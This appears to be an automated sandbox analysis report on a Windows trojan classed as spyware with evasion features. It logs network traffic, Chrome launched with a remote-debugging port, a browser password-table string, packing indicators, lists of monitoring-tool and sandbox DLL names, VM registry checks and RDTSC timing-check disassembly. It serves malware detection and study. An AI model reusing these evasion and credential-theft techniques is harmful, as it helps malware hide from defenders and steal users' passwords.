          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.25.228:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.53.19:443 -> 192.168.2.4:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49779 version: TLS 1.2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04BD0CE5 CreateDesktopExA,0_2_04BD0CE5

          System Summary

          barindex
          PE file contains section with special chars
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 2348
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: vunchriq ZLIB complexity 0.9947329899199525
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/28@6/6
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3U6DL9J5.htmJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6976
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\8d17f28d-b9f5-49db-9ea0-8d85277d33d1Jump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: CAEHDBAAE.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 36%
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 --field-trial-handle=2408,i,1632556289935480309,8221903715599976969,262144 /prefetch:8
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 2348
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 --field-trial-handle=2408,i,1632556289935480309,8221903715599976969,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: file.exeStatic file information: File size 1916928 > 1048576
          Source: file.exeStatic PE information: Raw size of vunchriq is bigger than: 0x100000 < 0x1a5a00

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vunchriq:EW;ouhnwlrl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vunchriq:EW;ouhnwlrl:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x1e3116 should be: 0x1d5937
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: vunchriq
          Source: file.exeStatic PE information: section name: ouhnwlrl
          Source: file.exeStatic PE information: section name: .taggant
          Source: file.exeStatic PE information: section name: vunchriq entropy: 7.954609721456009

          Boot Survival

          barindex
          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes / dynamic malware analysis system (registry check)
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: file.exe, 00000000.00000003.1724777363.0000000004A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: <EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66986A second address: 66986E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFA63 second address: 7DFA78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA8CCF3D56h 0x00000008 jmp 00007FBA8CCF3D5Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFEA0 second address: 7DFEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E02FC second address: 7E0302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0302 second address: 7E0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0306 second address: 7E031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBA8CCF3D5Dh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E031B second address: 7E0338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23D9h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0338 second address: 7E033E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E38AA second address: 7E38F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FBA8CEE23DAh 0x00000010 jmp 00007FBA8CEE23D4h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a je 00007FBA8CEE23C8h 0x00000020 push edi 0x00000021 pop edi 0x00000022 jns 00007FBA8CEE23C8h 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jno 00007FBA8CEE23C6h 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E38F9 second address: 7E38FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E38FD second address: 7E3922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA8CEE23CCh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FBA8CEE23CCh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3922 second address: 7E39A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov cx, di 0x0000000d mov dx, bx 0x00000010 popad 0x00000011 push 00000003h 0x00000013 add dl, FFFFFFE1h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FBA8CCF3D58h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movsx edi, si 0x00000035 push 00000003h 0x00000037 xor dword ptr [ebp+13AC2219h], eax 0x0000003d call 00007FBA8CCF3D59h 0x00000042 jmp 00007FBA8CCF3D66h 0x00000047 push eax 0x00000048 jng 00007FBA8CCF3D5Eh 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jl 00007FBA8CCF3D56h 0x0000005b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E39A2 second address: 7E39A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E39A6 second address: 7E39E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBA8CCF3D5Fh 0x0000000c jnl 00007FBA8CCF3D56h 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FBA8CCF3D68h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C63 second address: 7F5C6D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802A13 second address: 802A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E73 second address: 802E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E77 second address: 802E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FBA8CCF3D56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E86 second address: 802E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802FF5 second address: 802FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802FFA second address: 80300D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CDh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8031B2 second address: 8031BF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA8CCF3D58h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8031BF second address: 8031C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803B5E second address: 803B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
